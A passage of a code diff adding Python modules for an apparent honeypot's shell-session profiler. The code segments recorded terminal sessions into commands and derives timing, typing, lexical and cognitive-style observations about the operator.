+    buffer is discarded at every terminator, so trailing input without
+    a final newline is dropped.
+    """
+    segmented: list[Command] = []
+    pending: list[str] = []
+    first_ts: float | None = None
+    tabs = 0
+    shortcuts = 0
+    pipes = 0
+
+    for ts, _kind, payload in inputs:
+        for ch in payload:
+            if ch not in ("\r", "\n"):
+                if not pending:
+                    first_ts = ts
+                pending.append(ch)
+                if ch == "\t":
+                    tabs += 1
+                elif ch == "|":
+                    pipes += 1
+                elif ch in SHORTCUT_CTRL_BYTES:
+                    shortcuts += 1
+                continue
+
+            # Terminator: emit whatever is buffered, then reset all state.
+            if pending:
+                stripped = "".join(pending).strip()
+                head = stripped.split(maxsplit=1)[0] if stripped else ""
+                segmented.append(Command(
+                    start_ts=first_ts if first_ts is not None else ts,
+                    end_ts=ts,
+                    first_token_hash=hash_token(head),
+                    tab_count=tabs,
+                    shortcut_count=shortcuts,
+                    pipe_count=pipes,
+                ))
+            pending = []
+            first_ts = None
+            tabs = 0
+            shortcuts = 0
+            pipes = 0
+
+    return tuple(segmented)
+
+
+def _annotate_commands_with_output(
+    commands: tuple[Command, ...],
+    outputs: list[AsciinemaEvent],
+) -> tuple[tuple[Command, ...], tuple[PromptLine, ...]]:
+    """Rebuild ``commands`` with their output-derived fields populated.
+
+    Returns ``(commands, prompt_lines)``. Every returned ``Command``
+    carries ``errored``, ``output_bytes`` and ``followed_by_prompt``
+    (Step F.0); ``prompt_lines`` concatenates the ``PromptLine``
+    instances found in each command's window, in command order, for
+    installation on ``SessionContext.prompt_lines``.
+
+    A command's output window starts at its ``end_ts`` (the
+    ``\\r``/``\\n`` that ran it) and stops at the next command's
+    ``start_ts``. The final command's window has no upper bound
+    (``math.inf``), so late output is still attributed to it.
+    """
+    if not commands:
+        return commands, ()
+
+    # One window end per command: the successor's start, then infinity.
+    window_ends = [nxt.start_ts for nxt in commands[1:]]
+    window_ends.append(math.inf)
+
+    enriched: list[Command] = []
+    prompts_seen: list[PromptLine] = []
+    for cmd, window_end in zip(commands, window_ends):
+        n_bytes, had_error, found = _output_window(outputs, cmd.end_ts, window_end)
+        prompts_seen.extend(found)
+        enriched.append(Command(
+            start_ts=cmd.start_ts,
+            end_ts=cmd.end_ts,
+            first_token_hash=cmd.first_token_hash,
+            tab_count=cmd.tab_count,
+            shortcut_count=cmd.shortcut_count,
+            pipe_count=cmd.pipe_count,
+            errored=had_error,
+            output_bytes=n_bytes,
+            followed_by_prompt=bool(found),
+        ))
+    return tuple(enriched), tuple(prompts_seen)
+
+
+def _per_command_iats(
+    commands: tuple[Command, ...],
+    inputs: list[AsciinemaEvent],
+) -> tuple[tuple[float, ...], ...]:
+    """Compute the intra-command typing IATs, one tuple per command.
+
+    For each command, the input events whose timestamp lies in
+    ``[cmd.start_ts, cmd.end_ts)`` are selected and the non-negative
+    gaps between consecutive selected events are returned. The
+    half-open window leaves out events stamped at ``cmd.end_ts``, which
+    is where the ``\\r``/``\\n`` terminator sits.
+    """
+    per_cmd: list[tuple[float, ...]] = []
+    for cmd in commands:
+        stamps = [
+            ts
+            for ts, _kind, _data in inputs
+            if not (ts < cmd.start_ts or ts >= cmd.end_ts)
+        ]
+        per_cmd.append(tuple(
+            max(0.0, later - earlier)
+            for earlier, later in zip(stamps, stamps[1:])
+        ))
+    return tuple(per_cmd)
+
+
+def _output_bytes_between(
+    outputs: list[AsciinemaEvent],
+    start: float,
+    end: float,
+) -> int:
+    """Sum ``len(data)`` over output events stamped in ``[start, end)``."""
+    total = 0
+    for ts, _kind, payload in outputs:
+        if start <= ts < end:
+            total += len(payload)
+    return total
+
+
+def _typed_char_histograms(
+    inputs: list[AsciinemaEvent],
+) -> tuple[Mapping[str, int], Mapping[str, int], int, _LexCounters]:
+    """Walk input events, build typed-only unigram + bigram histograms
+    plus the Phase G lexical counters.
+
+    Skip paste-class events (``len(data) >= PASTE_MIN_CHARS_PER_EVENT``)
+    — pasted text reveals nothing about the operator's keyboard or
+    sentiment. Letter bigrams chain only across consecutive ASCII-letter
+    chars; a digit or punctuation character breaks the chain. Histogram
+    keys are lower-cased. When more than ``LAYOUT_BIGRAM_TOP_N`` distinct
+    bigrams were seen, only the most frequent ``LAYOUT_BIGRAM_TOP_N`` are
+    kept.
+
+    Lexical counters (G.0): a small word buffer (≤ ``LEXEME_MAX_LEN``)
+    accumulates ASCII-letter chars (case-folded). On any non-letter
+    boundary (or paste event, or end of input), suffixes of the buffer
+    are checked longest-first against ``OBSCENITY_LEXEMES`` /
+    ``POSITIVE_LEXEMES`` / ``NEGATIVE_LEXEMES`` (in that order for a
+    given suffix); the first match wins, so each word contributes at
+    most one hit to exactly one counter. Caps and bang runs are tracked
+    in the same walk.
+
+    Returns ``(unigrams, bigrams, total_letters, lex_counters)``.
+    """
+    unigrams: dict[str, int] = {}
+    bigrams: dict[str, int] = {}
+    total_letters = 0
+    # Previous ASCII letter (lower-cased), or None when the chain is broken.
+    last_letter: str | None = None
+
+    word_buf: list[str] = []
+    obscenity_hits = 0
+    positive_lex_hits = 0
+    negative_lex_hits = 0
+    caps_run_cur = 0
+    caps_run_max = 0
+    bang_run_cur = 0
+    bang_run_max = 0
+
+    def _flush_word() -> tuple[int, int, int]:
+        """Match longest lexeme suffix in ``word_buf``; return per-set deltas."""
+        # Does not clear ``word_buf``; callers do that themselves.
+        if not word_buf:
+            return 0, 0, 0
+        s = "".join(word_buf)
+        # Longest-suffix scan against fixed lexicons.
+        for length in range(min(len(s), LEXEME_MAX_LEN), 0, -1):
+            suffix = s[-length:]
+            if suffix in OBSCENITY_LEXEMES:
+                return 1, 0, 0
+            if suffix in POSITIVE_LEXEMES:
+                return 0, 1, 0
+            if suffix in NEGATIVE_LEXEMES:
+                return 0, 0, 1
+        return 0, 0, 0
+
+    for _t, _kind, data in inputs:
+        if len(data) >= PASTE_MIN_CHARS_PER_EVENT:
+            # Paste boundary breaks every running counter.
+            # The word typed so far is still scored before being dropped.
+            last_letter = None
+            obs_d, pos_d, neg_d = _flush_word()
+            obscenity_hits += obs_d
+            positive_lex_hits += pos_d
+            negative_lex_hits += neg_d
+            word_buf.clear()
+            caps_run_cur = 0
+            bang_run_cur = 0
+            continue
+        for c in data:
+            # Caps-run tracking
+            if c.isascii() and c.isupper():
+                caps_run_cur += 1
+                if caps_run_cur > caps_run_max:
+                    caps_run_max = caps_run_cur
+            else:
+                caps_run_cur = 0
+            # Bang-run tracking
+            if c == "!":
+                bang_run_cur += 1
+                if bang_run_cur > bang_run_max:
+                    bang_run_max = bang_run_cur
+            else:
+                bang_run_cur = 0
+            # Histogram + lexeme buffering
+            if c.isascii() and c.isalpha():
+                lower = c.lower()
+                unigrams[lower] = unigrams.get(lower, 0) + 1
+                total_letters += 1
+                if last_letter is not None:
+                    big = last_letter + lower
+                    bigrams[big] = bigrams.get(big, 0) + 1
+                last_letter = lower
+                word_buf.append(lower)
+                if len(word_buf) > LEXEME_MAX_LEN:
+                    # Slide window — only the tail can match a lexeme.
+                    word_buf[:] = word_buf[-LEXEME_MAX_LEN:]
+            else:
+                # Non-letter: ends both the bigram chain and the word.
+                last_letter = None
+                obs_d, pos_d, neg_d = _flush_word()
+                obscenity_hits += obs_d
+                positive_lex_hits += pos_d
+                negative_lex_hits += neg_d
+                word_buf.clear()
+
+    # Trailing word (no boundary at end of input).
+    obs_d, pos_d, neg_d = _flush_word()
+    obscenity_hits += obs_d
+    positive_lex_hits += pos_d
+    negative_lex_hits += neg_d
+
+    # Cap the bigram table; the sort is stable, so equal counts keep
+    # first-seen order.
+    if len(bigrams) > LAYOUT_BIGRAM_TOP_N:
+        top = sorted(bigrams.items(), key=lambda kv: -kv[1])[:LAYOUT_BIGRAM_TOP_N]
+        bigrams = dict(top)
+    return unigrams, bigrams, total_letters, _LexCounters(
+        obscenity_hits=obscenity_hits,
+        positive_lex_hits=positive_lex_hits,
+        negative_lex_hits=negative_lex_hits,
+        caps_run_max=caps_run_max,
+        bang_run_max=bang_run_max,
+    )
+
+
+def _output_window(
+    outputs: list[AsciinemaEvent],
+    start: float,
+    end: float,
+) -> tuple[int, bool, tuple[PromptLine, ...]]:
+    """Summarise the output events stamped in ``[start, end)``.
+
+    Returns ``(byte_count, errored, prompt_lines)``:
+
+    * ``byte_count`` — summed ``len(data)`` of the raw (pre-strip)
+      events in the window;
+    * ``errored`` — result of ``detect_error_in_output`` on the
+      ANSI-stripped concatenation of those events;
+    * ``prompt_lines`` — PS1 lines that ``extract_prompt_lines`` finds
+      in the same stripped text (Step F.0), stamped relative to the
+      last event in the window.
+
+    An empty window yields ``(0, False, ())`` without calling any of
+    the parsing helpers.
+
+    PII trade-off (Phase F): the stripped text is discarded on return,
+    but ``prompt_lines`` keeps PS1 strings (capped at
+    ``PROMPT_LINE_MAX_CHARS``). Only derived values leave the engine
+    via observations; the prompt strings live on ``SessionContext``
+    so F.1 / F.3 / E.4 can read them.
+    """
+    in_window = [(ts, payload) for ts, _kind, payload in outputs if start <= ts < end]
+    if not in_window:
+        return 0, False, ()
+
+    total = sum(len(payload) for _ts, payload in in_window)
+    final_ts = in_window[-1][0]
+    clean = strip_ansi("".join(payload for _ts, payload in in_window))
+    had_error = detect_error_in_output(clean)
+    found = tuple(extract_prompt_lines(
+        clean, base_ts=final_ts, max_chars=PROMPT_LINE_MAX_CHARS,
+    ))
+    return total, had_error, found
+
+
+def build_session_context(
+    events: Iterable[AsciinemaEvent],
+    *,
+    sid: str,
+    source: str,
+    evidence_ref: str | None = None,
+) -> SessionContext:
+    """Build the ``SessionContext`` for one session's ``events``.
+
+    ``events`` is consumed exactly once and partitioned into input
+    (``"i"``) and output (``"o"``) events; other kinds only contribute
+    to the time bounds. Each derivation helper then works from those
+    partitions. ``t_start`` is the first event's timestamp and
+    ``t_end`` the largest timestamp seen (both 0.0 when there are no
+    events). ``evidence_ref`` defaults to ``"session:<sid>"``.
+    """
+    typed: list[AsciinemaEvent] = []
+    printed: list[AsciinemaEvent] = []
+    first_ts: float | None = None
+    max_ts: float = 0.0
+
+    for event in events:
+        ts, kind, _payload = event
+        if first_ts is None:
+            first_ts = ts
+        if ts > max_ts:
+            max_ts = ts
+        if kind == "i":
+            typed.append(event)
+        elif kind == "o":
+            printed.append(event)
+
+    t_start = 0.0 if first_ts is None else first_ts
+    t_end = 0.0 if first_ts is None else max_ts
+
+    iats: tuple[float, ...] = tuple(
+        max(0.0, later[0] - earlier[0])
+        for earlier, later in zip(typed, typed[1:])
+    )
+    paste_bursts, paste_count = _detect_paste_bursts(typed)
+    typing_bursts = _split_typing_bursts(iats)
+    backspace_count, backspace_iats, kill_line_count = _scan_correction_signals(typed)
+    bare_commands = _segment_commands(typed)
+    commands, prompt_lines = _annotate_commands_with_output(bare_commands, printed)
+
+    # Adjacent (command, successor) pairs drive both gap-based series,
+    # so each has ``len(commands) - 1`` entries.
+    cmd_pairs = tuple(zip(commands, commands[1:]))
+    inter_cmd_iats = tuple(
+        max(0.0, nxt.start_ts - cur.end_ts) for cur, nxt in cmd_pairs
+    )
+    output_per_cmd = tuple(
+        _output_bytes_between(printed, cur.end_ts, nxt.start_ts)
+        for cur, nxt in cmd_pairs
+    )
+    intra_command_iats = _per_command_iats(commands, typed)
+    typed_uni, typed_bi, typed_letters, lex = _typed_char_histograms(typed)
+
+    return SessionContext(
+        sid=sid,
+        source=source,
+        evidence_ref=evidence_ref or f"session:{sid}",
+        t_start=t_start,
+        t_end=t_end,
+        duration_s=max(0.0, t_end - t_start),
+        input_events=tuple(typed),
+        output_events=tuple(printed),
+        iats=iats,
+        paste_bursts=paste_bursts,
+        paste_event_count=paste_count,
+        commands=commands,
+        inter_cmd_iats=inter_cmd_iats,
+        output_per_cmd=output_per_cmd,
+        typing_bursts=typing_bursts,
+        backspace_count=backspace_count,
+        backspace_iats=backspace_iats,
+        kill_line_count=kill_line_count,
+        intra_command_iats=intra_command_iats,
+        prompt_lines=prompt_lines,
+        typed_unigram_counts=typed_uni,
+        typed_bigram_counts=typed_bi,
+        typed_letter_count=typed_letters,
+        obscenity_hits=lex.obscenity_hits,
+        positive_lex_hits=lex.positive_lex_hits,
+        negative_lex_hits=lex.negative_lex_hits,
+        caps_run_max=lex.caps_run_max,
+        bang_run_max=lex.bang_run_max,
+    )
--- a/decnet/profiler/behave_shell/_features/init.py
+++ b/decnet/profiler/behave_shell/_features/init.py
@@ -0,0 +1,104 @@
+"""Registered feature functions.
+
+Each entry takes a ``SessionContext`` and yields zero or more
+``Observation`` instances. Adding a primitive = adding a function in a
+sibling module and appending it to ``FEATURES``.
+"""
+from __future__ import annotations
+
+from typing import Callable, Iterable
+
+from behave_core.spec.envelope import Observation
+
+from decnet.profiler.behave_shell._ctx import SessionContext
+from decnet.profiler.behave_shell._features.cognitive import (
+    cognitive_load,
+    command_branch_diversity,
+    error_resilience_fallback_to_man,
+    error_resilience_frustration_typing,
+    error_resilience_retry_tactic,
+    exploration_style,
+    feedback_loop_engagement,
+    planning_depth,
+    tool_vocabulary,
+    inter_command_consistency,
+    inter_command_latency_class,
+)
+from decnet.profiler.behave_shell._features.emotional_valence import (
+    arousal,
+    frustration_venting,
+    stress_response,
+    valence,
+)
+from decnet.profiler.behave_shell._features.environmental import (
+    keyboard_layout,
+    locale,
+    numpad_usage,
+    shell_type,
+    terminal_multiplexer,
+)
+from decnet.profiler.behave_shell._features.operational import (
+    cleanup_behavior,
+    multi_actor_indicators,
+    objective,
+    opsec_discipline,
+)
+from decnet.profiler.behave_shell._features.temporal import (
+    escalation_pattern,
+    exit_behavior,
+    landing_ritual,
+    session_duration,
+)
+from decnet.profiler.behave_shell._features.motor import (
+    command_chunking,
+    error_correction,
+    input_modality,
+    keystroke_cadence,
+    motor_stability,
+    paste_burst_rate,
+    pipe_chaining_depth,
+    shortcut_usage,
+    tab_completion,
+)
+
+# Common signature of every registered feature: it receives the session
+# context and returns an iterable of observations.
+FeatureFn = Callable[[SessionContext], Iterable[Observation]]
+
+# The registry itself. Entries are grouped below by the sibling module
+# they are imported from.
+FEATURES: tuple[FeatureFn, ...] = (
+    # motor
+    input_modality,
+    paste_burst_rate,
+    keystroke_cadence,
+    motor_stability,
+    error_correction,
+    command_chunking,
+    tab_completion,
+    shortcut_usage,
+    pipe_chaining_depth,
+    # cognitive
+    inter_command_latency_class,
+    command_branch_diversity,
+    feedback_loop_engagement,
+    inter_command_consistency,
+    cognitive_load,
+    exploration_style,
+    planning_depth,
+    tool_vocabulary,
+    error_resilience_retry_tactic,
+    error_resilience_frustration_typing,
+    error_resilience_fallback_to_man,
+    # temporal
+    session_duration,
+    escalation_pattern,
+    landing_ritual,
+    exit_behavior,
+    # environmental
+    shell_type,
+    terminal_multiplexer,
+    locale,
+    keyboard_layout,
+    numpad_usage,
+    # operational
+    objective,
+    opsec_discipline,
+    cleanup_behavior,
+    multi_actor_indicators,
+    # emotional_valence
+    valence,
+    arousal,
+    stress_response,
+    frustration_venting,
+)
--- a/decnet/profiler/behave_shell/_features/_emit.py
+++ b/decnet/profiler/behave_shell/_features/_emit.py
@@ -0,0 +1,32 @@
+"""Helper for building registry-valid :class:`Observation` records.
+
+Every feature module would otherwise repeat the same Window /
+source / evidence_ref boilerplate. This helper centralises it and is
+the one place to reach when emission semantics change (e.g. when we
+start parametrising windows on a per-primitive basis).
+"""
+from __future__ import annotations
+
+from typing import Any
+
+from behave_core.spec.envelope import Observation, Window
+
+from decnet.profiler.behave_shell._ctx import SessionContext
+
+
+def make_observation(
+    ctx: SessionContext,
+    *,
+    primitive: str,
+    value: Any,
+    confidence: float,
+) -> Observation:
+    """Wrap one primitive reading in an :class:`Observation`.
+
+    The observation's window runs from ``ctx.t_start`` to ``ctx.t_end``;
+    ``source`` and ``evidence_ref`` are copied from ``ctx``. ``primitive``,
+    ``value`` and ``confidence`` are passed through exactly as given.
+    """
+    session_window = Window(start_ts=ctx.t_start, end_ts=ctx.t_end)
+    return Observation(
+        primitive=primitive,
+        value=value,
+        confidence=confidence,
+        window=session_window,
+        source=ctx.source,
+        evidence_ref=ctx.evidence_ref,
+    )
--- a/decnet/profiler/behave_shell/_features/cognitive.py
+++ b/decnet/profiler/behave_shell/_features/cognitive.py
@@ -0,0 +1,593 @@
+"""``cognitive.*`` feature functions.
+
+Step 5: ``cognitive.inter_command_latency_class``.
+Step 6: ``cognitive.command_branch_diversity``.
+Step 7: ``cognitive.feedback_loop_engagement``.
+Step 8: ``cognitive.inter_command_consistency``.
+Step D.1: ``cognitive.cognitive_load``.
+"""
+from __future__ import annotations
+
+import statistics
+from typing import Iterator
+
+from behave_core.spec.envelope import Observation
+
+from decnet.profiler.behave_shell._ctx import SessionContext
+from decnet.profiler.behave_shell._features._emit import make_observation
+from decnet.profiler.behave_shell._parse import hash_token
+from decnet.profiler.behave_shell._thresholds import (
+    BRANCH_DIVERSITY_LINEAR_MIN,
+    COGNITIVE_LOAD_CHUNKING_REF_CV,
+    COGNITIVE_LOAD_LOW_MAX,
+    COGNITIVE_LOAD_MEDIUM_MAX,
+    COGNITIVE_LOAD_PACE_REF_CV,
+    EXPLORATION_CHAOTIC_BACKTRACK_MIN,
+    EXPLORATION_TARGETED_REP_MIN,
+    FEEDBACK_CORRELATION_MIN,
+    FEEDBACK_MIN_PAIRS,
+    FRUSTRATION_LOW_MAX,
+    FRUSTRATION_MODERATE_MAX,
+    IKI_THINK_MAX_S,
+    INTER_CMD_DELIBERATE_MAX,
+    INTER_CMD_INSTANT_MAX,
+    INTER_CMD_LLM_HEAVYWEIGHT_MAX,
+    INTER_CMD_LLM_LIGHTWEIGHT_MAX,
+    INTER_CMD_TYPING_MAX,
+    MIN_COMMANDS_FOR_FULL_CONFIDENCE,
+    PAUSE_CV_BIMODAL_MIN,
+    PAUSE_CV_METRONOMIC_MAX,
+    PLANNING_DEEP_MIN,
+    PLANNING_REACTIVE_MIN,
+    TOOL_VOCAB_BROAD_MIN,
+    TOOL_VOCAB_NARROW_MAX,
+)
+
+
+# Hashes of the "reach for the manual" commands, built once at import so
+# the per-session loop only performs a set-membership test instead of
+# re-hashing the three words for every command. The ``--help`` / ``-h``
+# flag forms cannot be matched here: they are not first tokens, and only
+# the *first* token's hash is kept per command (PII discipline). v0.2
+# will reconsider once corpus calibration justifies storing arg-token
+# hashes too.
+_HELP_FAMILY_HASHES: frozenset[str] = frozenset(
+    hash_token(word) for word in ("man", "help", "info")
+)
+
+
+def _clip01(x: float) -> float:
+    """Clamp ``x`` into the closed interval [0.0, 1.0]."""
+    # Conditional form (rather than min/max) so values that compare
+    # neither below 0 nor above 1 are returned untouched.
+    return 0.0 if x < 0.0 else (1.0 if x > 1.0 else x)
+
+
+def _cv(xs: tuple[float, ...] | list[float]) -> float | None:
+    """Return the coefficient of variation (sample stdev / mean) of ``xs``.
+
+    Yields ``None`` when the statistic is undefined here: fewer than two
+    samples, or a mean that is zero or negative.
+    """
+    if len(xs) < 2:
+        return None
+    centre = statistics.fmean(xs)
+    return None if centre <= 0.0 else statistics.stdev(xs) / centre
+
+
+def _bucket_inter_cmd_latency(median_iat: float) -> str:
+    """Map a median inter-command pause onto its latency bucket label.
+
+    The ceilings are tried in the order listed; the first one that
+    ``median_iat`` does not exceed wins. Anything above the last ceiling
+    is ``"long"``.
+    """
+    ladder = (
+        (INTER_CMD_INSTANT_MAX, "instant"),
+        (INTER_CMD_TYPING_MAX, "typing_speed"),
+        (INTER_CMD_DELIBERATE_MAX, "deliberate"),
+        (INTER_CMD_LLM_LIGHTWEIGHT_MAX, "llm_lightweight"),
+        (INTER_CMD_LLM_HEAVYWEIGHT_MAX, "llm_heavyweight"),
+    )
+    for ceiling, label in ladder:
+        if median_iat <= ceiling:
+            return label
+    return "long"
+
+
+def inter_command_latency_class(ctx: SessionContext) -> Iterator[Observation]:
+    """Emit ``cognitive.inter_command_latency_class``.
+
+    The median of the session's inter-command pauses is bucketed via
+    ``_bucket_inter_cmd_latency``. Nothing is emitted when the session
+    has no inter-command pauses. Confidence is 0.80, or 0.40 when the
+    session has fewer than ``MIN_COMMANDS_FOR_FULL_CONFIDENCE`` commands.
+    """
+    pauses = ctx.inter_cmd_iats
+    if not pauses:
+        return
+    label = _bucket_inter_cmd_latency(statistics.median(pauses))
+    # Sample-size honesty: thin sessions get the reduced confidence.
+    well_sampled = len(ctx.commands) >= MIN_COMMANDS_FOR_FULL_CONFIDENCE
+    yield make_observation(
+        ctx,
+        primitive="cognitive.inter_command_latency_class",
+        value=label,
+        confidence=0.80 if well_sampled else 0.40,
+    )
+
+
+def command_branch_diversity(ctx: SessionContext) -> Iterator[Observation]:
+    """Emit ``cognitive.command_branch_diversity``.
+
+    Timing-free, content-based signal: the share of distinct
+    ``first_token_hash`` values among all commands.
+
+    * no commands: nothing is emitted.
+    * fewer than ``MIN_COMMANDS_FOR_FULL_CONFIDENCE`` commands:
+      ``unknown`` at confidence 1.0 (too little data is itself a firm
+      answer).
+    * ratio >= ``BRANCH_DIVERSITY_LINEAR_MIN``: ``linear_playbook``.
+    * otherwise: ``adaptive_branching`` (tools are being re-used).
+    """
+    total = len(ctx.commands)
+    if total == 0:
+        return
+    if total >= MIN_COMMANDS_FOR_FULL_CONFIDENCE:
+        distinct_tools = len(set(cmd.first_token_hash for cmd in ctx.commands))
+        if distinct_tools / total >= BRANCH_DIVERSITY_LINEAR_MIN:
+            verdict = "linear_playbook"
+        else:
+            verdict = "adaptive_branching"
+        score = 0.80
+    else:
+        verdict = "unknown"
+        score = 1.0
+    yield make_observation(
+        ctx,
+        primitive="cognitive.command_branch_diversity",
+        value=verdict,
+        confidence=score,
+    )
+
+
+def feedback_loop_engagement(ctx: SessionContext) -> Iterator[Observation]:
+    """Emit ``cognitive.feedback_loop_engagement``.
+
+    Correlates ``output_per_cmd[i]`` with ``inter_cmd_iats[i]`` using
+    ``statistics.correlation``. A coefficient above
+    ``FEEDBACK_CORRELATION_MIN`` reads as ``closed_loop``; anything else
+    as ``fire_and_forget`` (confidence 0.75 in both cases).
+
+    ``unknown`` at confidence 1.0 is emitted when the correlation cannot
+    be computed honestly: no output events, fewer than
+    ``FEEDBACK_MIN_PAIRS`` pairs, or ``statistics.correlation`` raising
+    ``StatisticsError``. With insufficient data *and* no commands at all,
+    nothing is emitted.
+    """
+    samples = list(zip(ctx.output_per_cmd, ctx.inter_cmd_iats))
+    insufficient = not ctx.output_events or len(samples) < FEEDBACK_MIN_PAIRS
+    if insufficient and not ctx.commands:
+        return
+
+    # Default verdict; only overwritten when a correlation is obtained.
+    verdict, score = "unknown", 1.0
+    if not insufficient:
+        seen_bytes = [float(pair[0]) for pair in samples]
+        pauses = [float(pair[1]) for pair in samples]
+        try:
+            coeff = statistics.correlation(seen_bytes, pauses)
+        except statistics.StatisticsError:
+            # Correlation undefined for this data - keep ``unknown``.
+            pass
+        else:
+            if coeff > FEEDBACK_CORRELATION_MIN:
+                verdict = "closed_loop"
+            else:
+                verdict = "fire_and_forget"
+            score = 0.75
+    yield make_observation(
+        ctx,
+        primitive="cognitive.feedback_loop_engagement",
+        value=verdict,
+        confidence=score,
+    )
+
+
+def error_resilience_fallback_to_man(ctx: SessionContext) -> Iterator[Observation]:
+    """Emit ``cognitive.error_resilience.fallback_to_man``.
+
+    ``present`` when at least one errored command is immediately followed
+    by a command whose ``first_token_hash`` is in ``_HELP_FAMILY_HASHES``
+    (``man`` / ``help`` / ``info``); ``absent`` otherwise. An errored
+    command with no successor cannot trigger the fallback.
+
+    Nothing is emitted when no command errored. Confidence is 0.65, or
+    0.40 when fewer than ``MIN_COMMANDS_FOR_FULL_CONFIDENCE`` commands
+    errored.
+
+    Flag forms such as ``--help`` / ``-h`` are invisible here because
+    only the first token's hash is inspected.
+    """
+    cmds = ctx.commands
+    failed_at = [pos for pos, cmd in enumerate(cmds) if cmd.errored]
+    if not failed_at:
+        return
+    reached_for_manual = any(
+        pos + 1 < len(cmds)
+        and cmds[pos + 1].first_token_hash in _HELP_FAMILY_HASHES
+        for pos in failed_at
+    )
+
+    well_sampled = len(failed_at) >= MIN_COMMANDS_FOR_FULL_CONFIDENCE
+    yield make_observation(
+        ctx,
+        primitive="cognitive.error_resilience.fallback_to_man",
+        value="present" if reached_for_manual else "absent",
+        confidence=0.65 if well_sampled else 0.40,
+    )
+
+
+def error_resilience_frustration_typing(ctx: SessionContext) -> Iterator[Observation]:
+    """Emit ``cognitive.error_resilience.frustration_typing``.
+
+    For every command after the first, the median of its intra-command
+    IATs is filed under "previous command errored" or "previous command
+    succeeded". The relative gap between the two group medians
+    (``|err - ok| / ok``) is bucketed: below ``FRUSTRATION_LOW_MAX`` is
+    ``low``, below ``FRUSTRATION_MODERATE_MAX`` is ``moderate``, anything
+    else ``high``. Direction is ignored, so speeding up and slowing down
+    count alike.
+
+    Nothing is emitted when there are fewer than two commands, when the
+    IAT table does not line up with the command list, when either group
+    is empty, or when the success-group median is not positive.
+    Confidence is 0.60, or 0.40 when the post-error group holds fewer
+    than ``MIN_COMMANDS_FOR_FULL_CONFIDENCE`` samples.
+    """
+    cmds = ctx.commands
+    intra = ctx.intra_command_iats
+    if len(cmds) < 2 or len(intra) != len(cmds):
+        return
+
+    after_failure: list[float] = []
+    after_success: list[float] = []
+    for pos in range(1, len(cmds)):
+        gaps = intra[pos]
+        if gaps:
+            bucket = after_failure if cmds[pos - 1].errored else after_success
+            bucket.append(statistics.median(gaps))
+    if not (after_failure and after_success):
+        return
+
+    baseline = statistics.median(after_success)
+    if baseline <= 0.0:
+        return
+    shift = abs(statistics.median(after_failure) - baseline) / baseline
+
+    if shift < FRUSTRATION_LOW_MAX:
+        verdict = "low"
+    elif shift < FRUSTRATION_MODERATE_MAX:
+        verdict = "moderate"
+    else:
+        verdict = "high"
+
+    well_sampled = len(after_failure) >= MIN_COMMANDS_FOR_FULL_CONFIDENCE
+    yield make_observation(
+        ctx,
+        primitive="cognitive.error_resilience.frustration_typing",
+        value=verdict,
+        confidence=0.60 if well_sampled else 0.40,
+    )
+
+
+def error_resilience_retry_tactic(ctx: SessionContext) -> Iterator[Observation]:
+    """Emit ``cognitive.error_resilience.retry_tactic``.
+
+    Each errored command is classified by what came next:
+
+    * **rerun** - the next command has the same ``first_token_hash``.
+    * **switch** - the next command has a different ``first_token_hash``.
+    * **abort** - there is no next command.
+
+    The most frequent response is reported; ties resolve in the order
+    rerun, switch, abort. The registry's ``modify`` value is never
+    produced here because only the first token's hash is compared.
+
+    Nothing is emitted when no command errored. Confidence is 0.65, or
+    0.40 when fewer than ``MIN_COMMANDS_FOR_FULL_CONFIDENCE`` commands
+    errored.
+    """
+    cmds = ctx.commands
+    failures = [(pos, cmd) for pos, cmd in enumerate(cmds) if cmd.errored]
+    if not failures:
+        return
+
+    # Listed in tie-break priority; ``max`` keeps the first maximum.
+    priority = ("rerun", "switch", "abort")
+    tally = dict.fromkeys(priority, 0)
+    last_pos = len(cmds) - 1
+    for pos, cmd in failures:
+        if pos >= last_pos:
+            outcome = "abort"
+        elif cmds[pos + 1].first_token_hash == cmd.first_token_hash:
+            outcome = "rerun"
+        else:
+            outcome = "switch"
+        tally[outcome] += 1
+    verdict = max(priority, key=tally.__getitem__)
+
+    well_sampled = len(failures) >= MIN_COMMANDS_FOR_FULL_CONFIDENCE
+    yield make_observation(
+        ctx,
+        primitive="cognitive.error_resilience.retry_tactic",
+        value=verdict,
+        confidence=0.65 if well_sampled else 0.40,
+    )
+
+
+def tool_vocabulary(ctx: SessionContext) -> Iterator[Observation]:
+    """Emit ``cognitive.tool_vocabulary`` (narrow / moderate / broad).
+
+    Based on the absolute number of distinct ``first_token_hash`` values:
+    at most ``TOOL_VOCAB_NARROW_MAX`` is ``narrow``, at least
+    ``TOOL_VOCAB_BROAD_MIN`` is ``broad``, anything between is
+    ``moderate``.
+
+    Nothing is emitted for a session without commands. Sessions below
+    ``MIN_COMMANDS_FOR_FULL_CONFIDENCE`` commands still emit, at
+    confidence 0.40 instead of 0.70.
+    """
+    cmds = ctx.commands
+    if not cmds:
+        return
+    breadth = len(set(cmd.first_token_hash for cmd in cmds))
+    if breadth <= TOOL_VOCAB_NARROW_MAX:
+        verdict = "narrow"
+    elif breadth >= TOOL_VOCAB_BROAD_MIN:
+        verdict = "broad"
+    else:
+        verdict = "moderate"
+    well_sampled = len(cmds) >= MIN_COMMANDS_FOR_FULL_CONFIDENCE
+    yield make_observation(
+        ctx,
+        primitive="cognitive.tool_vocabulary",
+        value=verdict,
+        confidence=0.70 if well_sampled else 0.40,
+    )
+
+
+def planning_depth(ctx: SessionContext) -> Iterator[Observation]:
+    """Emit ``cognitive.planning_depth`` (deep / shallow / reactive).
+
+    Looks at how the inter-command pauses are distributed:
+
+    * **deep** - the share of pauses longer than ``IKI_THINK_MAX_S`` is
+      at least ``PLANNING_DEEP_MIN``.
+    * **reactive** - otherwise, the share of pauses no longer than
+      ``INTER_CMD_INSTANT_MAX`` is at least ``PLANNING_REACTIVE_MIN``.
+    * **shallow** - neither of the above.
+
+    Nothing is emitted when there are no inter-command pauses.
+    Confidence is 0.65, or 0.40 when the session has fewer than
+    ``MIN_COMMANDS_FOR_FULL_CONFIDENCE`` commands.
+    """
+    pauses = ctx.inter_cmd_iats
+    if not pauses:
+        return
+    total = len(pauses)
+    think_share = sum(1 for p in pauses if p > IKI_THINK_MAX_S) / total
+    snap_share = sum(1 for p in pauses if p <= INTER_CMD_INSTANT_MAX) / total
+
+    # "deep" is checked first, so it wins when both shares qualify.
+    if think_share >= PLANNING_DEEP_MIN:
+        verdict = "deep"
+    elif snap_share >= PLANNING_REACTIVE_MIN:
+        verdict = "reactive"
+    else:
+        verdict = "shallow"
+
+    well_sampled = len(ctx.commands) >= MIN_COMMANDS_FOR_FULL_CONFIDENCE
+    yield make_observation(
+        ctx,
